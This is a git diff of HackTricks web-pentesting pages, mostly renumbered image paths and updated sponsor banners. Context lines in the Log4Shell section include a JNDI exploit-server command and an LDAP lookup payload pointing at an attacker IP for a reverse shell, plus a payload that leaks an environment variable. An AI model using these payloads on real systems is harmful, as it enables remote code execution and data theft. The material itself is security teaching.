diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index c10f71e96..b64cc9aa0 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -693,7 +693,7 @@ Both methods exploit the nuances of CSP implementation and behavior in browsers,
 
 Trick from [**here**](https://ctftime.org/writeup/29310).
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -839,7 +839,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 
 ​
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/pentesting-web/cors-bypass.md b/pentesting-web/cors-bypass.md
index 90920b5ab..142336c37 100644
--- a/pentesting-web/cors-bypass.md
+++ b/pentesting-web/cors-bypass.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -208,7 +208,7 @@ Regex patterns typically concentrate on alphanumeric, dot (.), and hyphen (-) ch
 
 **For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
 
-![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (281).png>)
+![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (284).png>)
 
 ### From XSS inside a subdomain
 
@@ -291,7 +291,7 @@ To better understand and mitigate this vulnerability, you can use the BurpSuite
 
 Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy.
 
-![](<../.gitbook/assets/image (853).png>)
+![](<../.gitbook/assets/image (856).png>)
 
 ### Easy (useless?) bypass
 
@@ -355,7 +355,7 @@ This technique leverages the behavior of browsers when multiple IP addresses are
 Note that in order to access localhost you should try to rebind **127.0.0.1** in Windows and **0.0.0.0** in linux.\
 Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
 
-<img src="../.gitbook/assets/image (137).png" alt="" data-size="original">
+<img src="../.gitbook/assets/image (140).png" alt="" data-size="original">
 {% endhint %}
 
 For more info you can check [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
@@ -402,8 +402,7 @@ You can find more information about the previous bypass techniques and how to us
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CORS%20Misconfiguration)
 * [https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b](https://medium.com/entersoftsecurity/every-bug-bounty-hunter-should-know-the-evil-smile-of-the-jsonp-over-the-browsers-same-origin-438af3a0ac3b)
 
-
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md
index 2f77911fe..7816ef410 100644
--- a/pentesting-web/crlf-0d-0a.md
+++ b/pentesting-web/crlf-0d-0a.md
@@ -177,11 +177,11 @@ If a platform is taking **data from an HTTP request and using it without sanitiz
 
 For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers:
 
-<figure><img src="../.gitbook/assets/image (656).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
 
 Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know:
 
-<figure><img src="../.gitbook/assets/image (634).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>
 
 ### How to Prevent CRLF / HTTP Header Injections in Web Applications
 
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 7db71d1b9..6faeb47c1 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -45,7 +45,7 @@ To exploit a CSRF vulnerability, several conditions must be met:
 
 You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request:
 
-<figure><img src="../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
 
 ### Defending Against CSRF
 
@@ -623,7 +623,7 @@ with open(PASS_LIST, "r") as f:
 
 ​
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/pentesting-web/dependency-confusion.md b/pentesting-web/dependency-confusion.md
index 06dc9e4d8..0c2e10a72 100644
--- a/pentesting-web/dependency-confusion.md
+++ b/pentesting-web/dependency-confusion.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -56,7 +56,7 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b
 * [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
 * [https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d](https://zego.engineering/dependency-confusion-in-aws-codeartifact-86b9ff68963d)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
index 83ec3a38b..cd8737125 100644
--- a/pentesting-web/deserialization/README.md
+++ b/pentesting-web/deserialization/README.md
@@ -246,9 +246,9 @@ You can see in the example that when a function is serialized the `_$$ND_FUNC$$_
 
 Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it.
 
-![](<../../.gitbook/assets/image (348).png>)
+![](<../../.gitbook/assets/image (351).png>)
 
-![](<../../.gitbook/assets/image (443).png>)
+![](<../../.gitbook/assets/image (446).png>)
 
 As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**.
 
@@ -642,9 +642,9 @@ Find whats is **JNDI Injection, how to abuse it via RMI, CORBA & LDAP and how to
 
 There are several products using this middleware to send messages:
 
-![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (311).png>)
+![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (314).png>)
 
-![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (1053).png>)
+![https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf](<../../.gitbook/assets/image (1056).png>)
 
 ### Exploitation
 
diff --git a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index c353b38ec..4732f496c 100644
--- a/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -26,19 +26,19 @@ The **System.Windows.Data** namespace, found within the **PresentationFramework.
 
 Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
 
-![](<../../.gitbook/assets/image (424).png>)
+![](<../../.gitbook/assets/image (427).png>)
 
 As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:
 
-![](<../../.gitbook/assets/image (316).png>)
+![](<../../.gitbook/assets/image (319).png>)
 
 Ok, lets continue seeing what does `this.BeginQuery()` does. `BeginQuery` is overridden by `ObjectDataProvider` and this is what it does:
 
-![](<../../.gitbook/assets/image (342).png>)
+![](<../../.gitbook/assets/image (345).png>)
 
 Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see what does that execute:
 
-![](<../../.gitbook/assets/image (593).png>)
+![](<../../.gitbook/assets/image (596).png>)
 
 Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
 
diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index bf1183cc3..3c77a4070 100644
--- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -178,7 +178,7 @@ The **extension** has **passive** and active **capabilities**.
 
 By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
 
-![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (762).png>)
+![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (765).png>)
 
 ### Active
 
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index da84d286c..16b6ba4d4 100644
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -51,7 +51,7 @@ Despite protections, vulnerabilities remain, mainly due to the lack of safeguard
 
 ### JNDI Example
 
-![](<../../.gitbook/assets/image (1019).png>)
+![](<../../.gitbook/assets/image (1022).png>)
 
 Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
 
@@ -90,7 +90,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA
 
 #### Deserialization exploit
 
-![](<../../.gitbook/assets/image (272).png>)
+![](<../../.gitbook/assets/image (275).png>)
 
 The **exploit is serialized** and will be deserialized.\
 In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
@@ -99,7 +99,7 @@ In case `trustURLCodebase` is `true`, an attacker can provide his own classes in
 
 It's easier to attack this LDAP using **JavaFactory references**:
 
-![](<../../.gitbook/assets/image (1056).png>)
+![](<../../.gitbook/assets/image (1059).png>)
 
 ## Log4Shell Vulnerability
 
@@ -353,7 +353,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
 
-![](<../../.gitbook/assets/image (1115).png>)
+![](<../../.gitbook/assets/image (1118).png>)
 
 Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/generated}`**
 
@@ -419,13 +419,13 @@ As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-i
 
 In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
 
-![](<../../.gitbook/assets/image (1020).png>)
+![](<../../.gitbook/assets/image (1023).png>)
 
 ### Conversion Patterns Exceptions
 
 Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
 
-![](<../../.gitbook/assets/image (680).png>)
+![](<../../.gitbook/assets/image (683).png>)
 
 This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
 
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index 0eca2b52d..522a23fde 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -91,11 +91,11 @@ Check this writeup: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challe
 
 * **sanitize-html**
 
-<figure><img src="../../../.gitbook/assets/image (1137).png" alt="https://research.securitum.com/wp-content/uploads/sites/2/2020/08/image-7.png"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1140).png" alt="https://research.securitum.com/wp-content/uploads/sites/2/2020/08/image-7.png"><figcaption></figcaption></figure>
 
 * **dompurify**
 
-<figure><img src="../../../.gitbook/assets/image (1138).png" alt="https://research.securitum.com/wp-content/uploads/sites/2/2020/08/image-9.png"><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1141).png" alt="https://research.securitum.com/wp-content/uploads/sites/2/2020/08/image-9.png"><figcaption></figcaption></figure>
 
 * **Closure**
 
diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index 1d52fcfc6..063b239f2 100644
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,11 +26,11 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Serve XSS responses
 
-**For further details [take a look to the original reserach](https://portswigger.net/research/server-side-prototype-pollution)**
+**For further details** [**take a look to the original reserach**](https://portswigger.net/research/server-side-prototype-pollution)
 
 ### Change JSON content-type to HTML
 
@@ -148,10 +148,9 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
 
 * [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -170,7 +169,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
-</details>
\ No newline at end of file
+</details>
diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md
index b51a575a5..b6bbce109 100644
--- a/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -38,7 +38,7 @@ print(yaml.dump(range(1,10)))
 
 Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins).
 
-![](<../../.gitbook/assets/image (1037).png>)
+![](<../../.gitbook/assets/image (1040).png>)
 
 **safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example:
 
diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md
index c093c4ee7..bd632a8d3 100644
--- a/pentesting-web/domain-subdomain-takeover.md
+++ b/pentesting-web/domain-subdomain-takeover.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
 
 ## Domain takeover
 
@@ -103,13 +103,13 @@ For cloud providers, verifying domain ownership is crucial to prevent subdomain
 
 * [https://0xpatrik.com/subdomain-takeover/](https://0xpatrik.com/subdomain-takeover/)
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=domain-subdomain-takeover) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=domain-subdomain-takeover" %}
 
 <details>
 
diff --git a/pentesting-web/email-injections.md b/pentesting-web/email-injections.md
index 1b2dc2e09..1f0d13a0d 100644
--- a/pentesting-web/email-injections.md
+++ b/pentesting-web/email-injections.md
@@ -1,12 +1,12 @@
 # Email Injections
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
 
 <details>
 
@@ -108,11 +108,11 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
 
 ### Whitelist bypass
 
-<figure><img src="../.gitbook/assets/image (809).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
 ### Quotes
 
-<figure><img src="../.gitbook/assets/image (623).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&#x26;v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
 
 ### IPs
 
@@ -123,7 +123,7 @@ You can also use IPs as domain named between square brackets:
 
 ### Other vulns
 
-![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1128).png>)
+![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
 
 ## Third party SSO
 
@@ -173,10 +173,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md
index ad4645824..43cd19d65 100644
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -485,7 +485,7 @@ Similarly, for executing arbitrary system commands, one might use:
 
 It's important to **URL-encode these payloads**.
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -705,7 +705,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
 **I don't know how is this useful but it might be.**\
 _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 
-<figure><img src="../../.gitbook/assets/image (1028).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1031).png" alt=""><figcaption></figcaption></figure>
 
 ## References
 
@@ -714,7 +714,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 
 {% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index 14ac7c11a..c668a6e1e 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -1,4 +1,4 @@
-
